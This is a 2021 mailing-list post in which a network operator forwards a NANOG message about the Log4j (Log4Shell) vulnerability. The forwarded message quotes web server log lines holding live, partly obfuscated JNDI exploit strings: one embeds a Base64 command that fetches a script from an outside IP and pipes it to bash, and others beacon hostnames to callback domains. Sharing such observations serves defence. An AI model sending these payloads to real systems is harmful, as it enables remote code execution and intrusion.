[Bloat] Fwd: Log4j mitigation

Dave Taht dave.taht at gmail.com
Mon Dec 13 08:56:36 EST 2021 

for those of you losing sleep over the java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in java, and I lost 3 weeks of my
life over christmas to spectre, and several weeks per year - and
usually, right around christmas! coping with other CVE's.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk at ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean at ddostest.me>
Cc: <nanog at nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL),
in Headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
soon.

We are seeing things like this since 10th of Dec. And this is only a
typical Apache Logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}



-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC

More information about the Bloat mailing list